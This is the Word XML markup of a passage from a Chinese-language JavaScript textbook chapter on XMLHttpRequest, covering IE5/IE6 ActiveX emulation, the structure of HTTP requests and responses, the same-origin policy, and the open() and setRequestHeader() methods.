    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>你也能重用已存在的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>，但注意这将会终止之前通过该对象挂起的任何请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>最早把</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象引入到</w:t>
      </w:r>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:t>中，且在</w:t>
      </w:r>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>中它只是一个</w:t>
      </w:r>
      <w:r>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>IE7</w:t>
      </w:r>
      <w:r>
        <w:t>之前的版本不支持非标准的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，但它能像如下这样模拟：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>E6</w:t>
      </w:r>
      <w:r>
        <w:t>中模拟</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(window.XMLHttpRequest===undefined){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.XMLHttpRequest=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{//</w:t>
      </w:r>
      <w:r>
        <w:t>如果可用，则使用</w:t>
      </w:r>
      <w:r>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r>
        <w:t>对象的最新版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new ActiveXObject("Msxml2.XMLHTTP.6.0");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，回退到较旧的版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new ActiveXObject("Msxml2.XMLHTTP.3.0");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e2){//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，抛错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("XMLHttpRequest is not supported");</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一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求由</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>部分组成：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求方法或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>动作</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>verb</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>正在请求的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一个可选的请求头集合，其中可能包括身份验证信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一个可选的请求主体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>服务器返回的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应包含</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一个数字和文字组成的状态码，用来显示请求的成功和失败</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一个响应头集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>响应主体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>接下来的前面两节会展示如何设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的每个部分和如何查询</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应的每个部分，随后的核心章节会涵盖更多的专门议题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>的基础请求</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>响应架构非常简单并且易于使用。但在实践中会有各种各样随之而来的复杂问题：客户端和服务器交换</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>，服务器重定向浏览器到其他服务器，缓存某些资源而剩下的不缓存，某些客户端通过代理服务器发送所有的请求等。</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>不是协议级的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP API</w:t>
      </w:r>
      <w:r>
        <w:t>而是浏览器级的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。浏览器需要考虑</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>、重定向、缓存和代理，但代码只需要担心请求和响应。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>HttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>和本地文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>网页中可以使用相对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的能力通常意味着我们能使用本地文件系统来开发和测试</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>，并避免对</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器进行不必要的部署。然后当使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>编程时，这通常是不可行的。</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>用于同</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t>协议一起工作。理论上，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>它能够同像</w:t>
      </w:r>
      <w:r>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:t>这样的其他协议一起工作，但比如像请求方法和响应状态码等部分</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>特有的。如果从本地文件中加载网页，那么该页面中的脚本将无法通过相对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>，因为这些</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>将相对于</w:t>
      </w:r>
      <w:r>
        <w:t>file://URL</w:t>
      </w:r>
      <w:r>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:t>http://URL</w:t>
      </w:r>
      <w:r>
        <w:t>。而同源策略通常会阻止使用绝对</w:t>
      </w:r>
      <w:r>
        <w:t>http://URL</w:t>
      </w:r>
      <w:r>
        <w:t>（请参见</w:t>
      </w:r>
      <w:r>
        <w:t>18.1.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）。结果是当使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>时，为了测试它们通常必须把文件上传到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器（或运行一个本地服务器）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="452" w:name="18_1_1_Zhi_Ding_Qing_Qiu_"/>
      <w:r>
        <w:t>18.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　指定请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="452"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象之后，发起</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求的下一步是调用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法去指定这个请求的两个必需部分：方法和</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.open("GET",//</w:t>
      </w:r>
      <w:r>
        <w:t>开始一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"data.csv");//URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个参数指定</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>方法或动作。这个字符串不区分大小写，但通常大家用大写字母来匹配</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>协议。</w:t>
      </w:r>
      <w:r>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r>
        <w:t>方法是得到广泛支持的。</w:t>
      </w:r>
      <w:r>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r>
        <w:t>用于常规请求，它适用于当</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>完全指定请求资源，当请求对服务器没有任何副作用以及当服务器的响</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>应是可缓存时。</w:t>
      </w:r>
      <w:r>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r>
        <w:t>方法常用于</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单。它在请求主体中包含额外数据（表单数据）且这些数据常存储到服务器上的数据库中（副作用）。相同</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的重复</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求从服务器得到的响应可能不同，同时不应该</w:t>
      </w:r>
      <w:r>
        <w:t>缓存使用这个方法的请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"POST"</w:t>
      </w:r>
      <w:r>
        <w:t>之外，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>规范也允许把</w:t>
      </w:r>
      <w:r>
        <w:t>"DELETE"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"HEAD"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"OPTIONS"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"PUT"</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个参数。（</w:t>
      </w:r>
      <w:r>
        <w:t>"HTTPCONNECT"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"TRACE"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"TRACK"</w:t>
      </w:r>
      <w:r>
        <w:t>因为安全风险已被明确禁止。）旧浏览器并不支持所有这些方法，但至少</w:t>
      </w:r>
      <w:r>
        <w:t>"HEAD"</w:t>
      </w:r>
      <w:r>
        <w:t>得到广泛支持，例</w:t>
      </w:r>
      <w:r>
        <w:t>18-13</w:t>
      </w:r>
      <w:r>
        <w:t>演示如何使用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，它是请求的主题。这是相对于文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，这个文档包含调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>的脚本。如果指定绝对</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>、协议、主机</w:t>
      </w:r>
      <w:r>
        <w:t>和端口通常必须匹配所在文档的对应内容：跨域的请求通常会报错。（但是当服务器明确允许跨域请求时，</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>规范会允许它，见</w:t>
      </w:r>
      <w:r>
        <w:t>18.1.6</w:t>
      </w:r>
      <w:r>
        <w:t>节。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果有请求头的话，请求进程的下个步骤是设置它。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求需要</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t>头指定请求主题的</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.setRequestHeader("Content-Type","text/plain");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果对相同的头调用</w:t>
      </w:r>
      <w:r>
        <w:t>setRequestHeader()</w:t>
      </w:r>
      <w:r>
        <w:t>多次，新值不会取代之前指定的值，相反，</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求将包</w:t>
      </w:r>
      <w:r>
        <w:t>含这个头的多个副本或这个头将指定多个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>你不能自己指定</w:t>
      </w:r>
      <w:r>
        <w:t>"Content-Length"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Date"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Referer"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"User-Agent"</w:t>
      </w:r>
      <w:r>
        <w:t>头，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>将自动添加这些头而防止伪造它们。类似地，</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象自动处理</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>、连接时间、字符集和编码判断，所以你无法向</w:t>
      </w:r>
      <w:r>
        <w:t>setRequestHeader()</w:t>
      </w:r>
      <w:r>
        <w:t>传递这些头：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3506637" cy="767750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="41" name="00041.jpeg" descr="000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00041.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3506637" cy="767750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>你能为请求指定</w:t>
      </w:r>
      <w:r>
        <w:t>"Authorization"</w:t>
      </w:r>
      <w:r>
        <w:t>头，但通常不需要这么做。如果请求一个受密码保护的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，把用户名和密码作为第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个和第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个参数传递给</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>将设置合适的头。（接下来我们将了解关于</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>可选的第三个参数。可选的用户名和密码参数会在第四部分有介绍。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
